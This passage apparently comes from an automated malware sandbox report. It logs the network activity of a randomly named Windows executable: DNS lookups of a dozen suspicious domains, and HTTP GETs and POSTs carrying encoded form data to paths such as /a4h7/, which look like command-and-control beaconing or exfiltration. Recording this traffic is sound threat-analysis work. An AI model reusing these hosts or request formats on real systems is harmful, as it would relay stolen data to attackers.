                                                                      Jan 8, 2025 16:15:00.558366060 CET5003680192.168.2.4188.114.96.3
                                                                      Jan 8, 2025 16:15:01.578138113 CET5003780192.168.2.4188.114.96.3
                                                                      Jan 8, 2025 16:15:01.583018064 CET8050037188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:15:01.583103895 CET5003780192.168.2.4188.114.96.3
                                                                      Jan 8, 2025 16:15:01.604249954 CET5003780192.168.2.4188.114.96.3
                                                                      Jan 8, 2025 16:15:01.609097004 CET8050037188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:15:01.609106064 CET8050037188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:15:01.609144926 CET8050037188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:15:01.609153032 CET8050037188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:15:01.609162092 CET8050037188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:15:01.609255075 CET8050037188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:15:01.609262943 CET8050037188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:15:01.609283924 CET8050037188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:15:01.609304905 CET8050037188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:15:02.352977037 CET8050037188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:15:02.354298115 CET8050037188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:15:02.354357958 CET8050037188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:15:02.354360104 CET5003780192.168.2.4188.114.96.3
                                                                      Jan 8, 2025 16:15:02.354402065 CET5003780192.168.2.4188.114.96.3
                                                                      Jan 8, 2025 16:15:03.120903015 CET5003780192.168.2.4188.114.96.3
                                                                      Jan 8, 2025 16:15:04.139431953 CET5003880192.168.2.4188.114.96.3
                                                                      Jan 8, 2025 16:15:04.144315958 CET8050038188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:15:04.144435883 CET5003880192.168.2.4188.114.96.3
                                                                      Jan 8, 2025 16:15:04.154334068 CET5003880192.168.2.4188.114.96.3
                                                                      Jan 8, 2025 16:15:04.159085989 CET8050038188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:15:04.892368078 CET8050038188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:15:04.892421961 CET8050038188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:15:04.892532110 CET5003880192.168.2.4188.114.96.3
                                                                      Jan 8, 2025 16:15:04.917772055 CET5003880192.168.2.4188.114.96.3
                                                                      Jan 8, 2025 16:15:04.922537088 CET8050038188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:15:09.968262911 CET5003980192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:09.973047972 CET8050039194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:09.973134041 CET5003980192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:09.992022991 CET5003980192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:09.996846914 CET8050039194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:10.616898060 CET8050039194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:10.618568897 CET8050039194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:10.618642092 CET5003980192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:11.495819092 CET5003980192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:12.514184952 CET5004080192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:12.519059896 CET8050040194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:12.519141912 CET5004080192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:12.533767939 CET5004080192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:12.538635015 CET8050040194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:13.142661095 CET8050040194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:13.142874956 CET8050040194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:13.142927885 CET5004080192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:14.042752028 CET5004080192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:15.061258078 CET5004180192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:15.067405939 CET8050041194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:15.069873095 CET5004180192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:15.084863901 CET5004180192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:15.090908051 CET8050041194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:15.090918064 CET8050041194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:15.091012001 CET8050041194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:15.091021061 CET8050041194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:15.091028929 CET8050041194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:15.091037035 CET8050041194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:15.091046095 CET8050041194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:15.091048956 CET8050041194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:15.091144085 CET8050041194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:15.774914026 CET8050041194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:15.775185108 CET8050041194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:15.775249004 CET5004180192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:16.589597940 CET5004180192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:17.608175039 CET5004280192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:17.613030910 CET8050042194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:17.613101006 CET5004280192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:17.622776985 CET5004280192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:17.627579927 CET8050042194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:18.236078024 CET8050042194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:18.236100912 CET8050042194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:18.236113071 CET8050042194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:18.236238956 CET8050042194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:18.236252069 CET5004280192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:18.236293077 CET5004280192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:18.241122007 CET5004280192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:18.245863914 CET8050042194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:23.383472919 CET5004380192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:23.388250113 CET8050043199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:23.388349056 CET5004380192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:23.403045893 CET5004380192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:23.407852888 CET8050043199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:23.844939947 CET8050043199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:23.844957113 CET8050043199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:23.844969034 CET8050043199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:23.845041037 CET5004380192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:24.917720079 CET5004380192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:25.942780972 CET5004480192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:25.947660923 CET8050044199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:25.947752953 CET5004480192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:25.962300062 CET5004480192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:25.967127085 CET8050044199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:26.403902054 CET8050044199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:26.403923035 CET8050044199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:26.403999090 CET5004480192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:26.404043913 CET8050044199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:26.404089928 CET5004480192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:27.464546919 CET5004480192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:28.483031034 CET5004580192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:28.487894058 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.487983942 CET5004580192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:28.502588987 CET5004580192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:28.507424116 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.507432938 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.507441044 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.507451057 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.507494926 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.507503033 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.507546902 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.507602930 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.507611036 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.949136972 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.949157953 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.949170113 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.949228048 CET5004580192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:30.011538982 CET5004580192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:31.038285971 CET5004680192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:31.107162952 CET8050046199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:31.107234955 CET5004680192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:31.308042049 CET5004680192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:31.312880039 CET8050046199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:31.561660051 CET8050046199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:31.561676979 CET8050046199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:31.561803102 CET8050046199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:31.561800957 CET5004680192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:31.561916113 CET5004680192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:31.564285994 CET5004680192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:31.569016933 CET8050046199.59.243.228192.168.2.4

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 8, 2025 16:12:49.570708990 CET5142453192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:12:49.584556103 CET53514241.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:13:05.265604973 CET6346453192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:13:05.983771086 CET53634641.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:13:18.998986006 CET6327353192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:13:19.011295080 CET53632731.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:13:32.405332088 CET6182653192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:13:33.417515993 CET6182653192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:13:33.931515932 CET53618261.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:13:33.931529045 CET53618261.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:13:47.562164068 CET5221853192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:13:47.725600958 CET53522181.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:14:00.936997890 CET6475753192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:14:01.809423923 CET53647571.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:14:15.358736038 CET5587653192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:14:15.376188993 CET53558761.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:14:29.035388947 CET6420653192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:14:29.423208952 CET53642061.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:14:43.127130032 CET6314153192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:14:43.137778997 CET53631411.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:14:56.438415051 CET6441953192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:14:56.454102039 CET53644191.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:15:09.943142891 CET5023653192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:15:09.966133118 CET53502361.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:15:23.249109983 CET6553253192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:15:23.381180048 CET53655321.1.1.1192.168.2.4

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Jan 8, 2025 16:12:49.570708990 CET192.168.2.41.1.1.10xf4baStandard query (0)www.zkdamdjj.shopA (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:13:05.265604973 CET192.168.2.41.1.1.10xbeefStandard query (0)www.75178.clubA (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:13:18.998986006 CET192.168.2.41.1.1.10xdf3fStandard query (0)www.orbitoasis.onlineA (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:13:32.405332088 CET192.168.2.41.1.1.10x17cdStandard query (0)www.thaor56.onlineA (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:13:33.417515993 CET192.168.2.41.1.1.10x17cdStandard query (0)www.thaor56.onlineA (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:13:47.562164068 CET192.168.2.41.1.1.10x8facStandard query (0)www.earbudsstore.shopA (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:14:00.936997890 CET192.168.2.41.1.1.10x235bStandard query (0)www.superiorfencing.netA (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:14:15.358736038 CET192.168.2.41.1.1.10x766Standard query (0)www.beylikduzu616161.xyzA (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:14:29.035388947 CET192.168.2.41.1.1.10x166dStandard query (0)www.zxyck.netA (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:14:43.127130032 CET192.168.2.41.1.1.10x717aStandard query (0)www.dailyfuns.infoA (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:14:56.438415051 CET192.168.2.41.1.1.10x188fStandard query (0)www.mydreamdeal.clickA (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:15:09.943142891 CET192.168.2.41.1.1.10x532aStandard query (0)www.maitreyatoys.worldA (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:15:23.249109983 CET192.168.2.41.1.1.10x987aStandard query (0)www.dating-apps-az-dn5.xyzA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Jan 8, 2025 16:12:49.584556103 CET1.1.1.1192.168.2.40xf4baNo error (0)www.zkdamdjj.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:12:49.584556103 CET1.1.1.1192.168.2.40xf4baNo error (0)www.zkdamdjj.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:13:05.983771086 CET1.1.1.1192.168.2.40xbeefNo error (0)www.75178.clubuaslkd.skasdhu.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 8, 2025 16:13:05.983771086 CET1.1.1.1192.168.2.40xbeefNo error (0)uaslkd.skasdhu.huhusddfnsuegcdn.comgtml.huksa.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 8, 2025 16:13:05.983771086 CET1.1.1.1192.168.2.40xbeefNo error (0)gtml.huksa.huhusddfnsuegcdn.com23.167.152.41A (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:13:19.011295080 CET1.1.1.1192.168.2.40xdf3fNo error (0)www.orbitoasis.onlineorbitoasis.onlineCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 8, 2025 16:13:19.011295080 CET1.1.1.1192.168.2.40xdf3fNo error (0)orbitoasis.online66.29.132.194A (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:13:33.931515932 CET1.1.1.1192.168.2.40x17cdNo error (0)www.thaor56.onlinethaor56.onlineCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 8, 2025 16:13:33.931515932 CET1.1.1.1192.168.2.40x17cdNo error (0)thaor56.online202.92.5.23A (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:13:33.931529045 CET1.1.1.1192.168.2.40x17cdNo error (0)www.thaor56.onlinethaor56.onlineCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 8, 2025 16:13:33.931529045 CET1.1.1.1192.168.2.40x17cdNo error (0)thaor56.online202.92.5.23A (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:13:47.725600958 CET1.1.1.1192.168.2.40x8facNo error (0)www.earbudsstore.shop194.195.220.41A (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:14:01.809423923 CET1.1.1.1192.168.2.40x235bNo error (0)www.superiorfencing.netsuperiorfencing.netCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 8, 2025 16:14:01.809423923 CET1.1.1.1192.168.2.40x235bNo error (0)superiorfencing.net103.230.159.86A (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:14:15.376188993 CET1.1.1.1192.168.2.40x766No error (0)www.beylikduzu616161.xyz188.114.97.3A (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:14:15.376188993 CET1.1.1.1192.168.2.40x766No error (0)www.beylikduzu616161.xyz188.114.96.3A (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:14:29.423208952 CET1.1.1.1192.168.2.40x166dNo error (0)www.zxyck.net118.107.250.103A (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:14:43.137778997 CET1.1.1.1192.168.2.40x717aNo error (0)www.dailyfuns.info209.74.77.109A (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:14:56.454102039 CET1.1.1.1192.168.2.40x188fNo error (0)www.mydreamdeal.click188.114.96.3A (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:14:56.454102039 CET1.1.1.1192.168.2.40x188fNo error (0)www.mydreamdeal.click188.114.97.3A (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:15:09.966133118 CET1.1.1.1192.168.2.40x532aNo error (0)www.maitreyatoys.world194.245.148.189A (IP address)IN (0x0001)false
                                                                      Jan 8, 2025 16:15:23.381180048 CET1.1.1.1192.168.2.40x987aNo error (0)www.dating-apps-az-dn5.xyz199.59.243.228A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • www.zkdamdjj.shop
                                                                      • www.75178.club
                                                                      • www.orbitoasis.online
                                                                      • www.thaor56.online
                                                                      • www.earbudsstore.shop
                                                                      • www.superiorfencing.net
                                                                      • www.beylikduzu616161.xyz
                                                                      • www.zxyck.net
                                                                      • www.dailyfuns.info
                                                                      • www.mydreamdeal.click
                                                                      • www.maitreyatoys.world
                                                                      • www.dating-apps-az-dn5.xyz

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449736188.114.96.3803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:12:49.605431080 CET489OUTGET /vluw/?F4=Q0yHy&xP7x=Qny9vPKZpQxlYqiENFjzCT0tS9CtbOtoVbvPUumHvVgYiZzoUIcT00lHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G+xnVYsPewXyxj+EGxgkPVAzfrNGcH22OaL0= HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.zkdamdjj.shop
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Jan 8, 2025 16:12:50.220717907 CET940INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:12:50 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vg9K6nnpsc8a5xr7oBYICIlg96XaNb08ap2IHSE9WTt504awDpJiBxITKkB22lCc6fTq9vD1MdijigyNDqOzbENNnC%2FxSMbdVOQf%2FPyvdIoXH4EcfMPsP%2BSkY4v%2B84YK5kqw0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fed20c879421891-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1694&min_rtt=1694&rtt_var=847&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=489&delivery_rate=0&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.44973723.167.152.41803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:13:06.004537106 CET749OUTPOST /a4h7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.75178.club
                                                                      Origin: http://www.75178.club
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 201
                                                                      Connection: close
                                                                      Referer: http://www.75178.club/a4h7/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 43 4e 53 6d 47 73 43 71 44 70 59 56 32 37 4e 53 4e 44 43 47 76 45 42 41 54 33 6d 56 72 6d 72 37 70 69 62 7a 53 2b 50 31 45 69 35 57 37 31 45 54 41 36 77 4c 6e 57 53 51 39 35 70 4a 57 54 4e 78 65 63 6c 30 46 34 2b 33 6e 2b 4b 34 41 4e 6a 64 50 38 6e 63 4c 48 42 61 56 53 6a 56 32 34 37 6f 72 36 67 6b 32 31 65 69 6c 65 56 50 4c 76 6a 45 4a 51 37 57 67 34 74 7a 37 52 42 48 74 76 34 53 49 34 4c 4a 4a 39 32 53 30 68 34 78 57 70 6e 30 65 4b 66 4d 34 64 6b 47 4d 4b 67 2f 75 6b 59 48 61 56 54 36 43 79 73 42 56 50 36 74 2b 68 63 6b 4b 46 73 31 6f 74 73 51 4a 45 74 31 72 59 55 76 63 67 3d 3d
                                                                      Data Ascii: xP7x=CNSmGsCqDpYV27NSNDCGvEBAT3mVrmr7pibzS+P1Ei5W71ETA6wLnWSQ95pJWTNxecl0F4+3n+K4ANjdP8ncLHBaVSjV247or6gk21eileVPLvjEJQ7Wg4tz7RBHtv4SI4LJJ92S0h4xWpn0eKfM4dkGMKg/ukYHaVT6CysBVP6t+hckKFs1otsQJEt1rYUvcg==


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.44973823.167.152.41803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:13:08.550069094 CET769OUTPOST /a4h7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.75178.club
                                                                      Origin: http://www.75178.club
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 221
                                                                      Connection: close
                                                                      Referer: http://www.75178.club/a4h7/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 43 4e 53 6d 47 73 43 71 44 70 59 56 31 61 39 53 49 69 43 47 2b 30 42 44 4e 6e 6d 56 79 32 72 33 70 69 58 7a 53 2f 4c 6c 45 55 52 57 37 52 55 54 42 2f 4d 4c 6b 57 53 51 79 5a 70 49 59 7a 4e 4d 65 63 70 57 46 36 36 33 6e 2b 75 34 41 4d 54 64 50 4d 62 64 4b 58 42 59 42 69 6a 58 38 59 37 6f 72 36 67 6b 32 31 4b 45 6c 66 39 50 4c 66 54 45 49 30 76 56 2b 6f 74 79 73 68 42 48 36 2f 35 36 49 34 4c 33 4a 38 36 6f 30 6e 38 78 57 72 50 30 65 66 7a 54 79 64 6b 49 43 71 68 59 74 56 35 6a 51 31 43 5a 42 6b 73 52 62 74 4f 51 37 6e 52 2b 62 30 4e 69 36 74 49 6a 55 44 6b 42 6d 62 70 6d 48 68 31 4d 34 61 57 49 5a 6d 6d 4d 47 78 48 31 69 58 2f 4e 62 77 41 3d
                                                                      Data Ascii: xP7x=CNSmGsCqDpYV1a9SIiCG+0BDNnmVy2r3piXzS/LlEURW7RUTB/MLkWSQyZpIYzNMecpWF663n+u4AMTdPMbdKXBYBijX8Y7or6gk21KElf9PLfTEI0vV+otyshBH6/56I4L3J86o0n8xWrP0efzTydkICqhYtV5jQ1CZBksRbtOQ7nR+b0Ni6tIjUDkBmbpmHh1M4aWIZmmMGxH1iX/NbwA=


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.44973923.167.152.41803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:13:11.096854925 CET10851OUTPOST /a4h7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.75178.club
                                                                      Origin: http://www.75178.club
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10301
                                                                      Connection: close
                                                                      Referer: http://www.75178.club/a4h7/
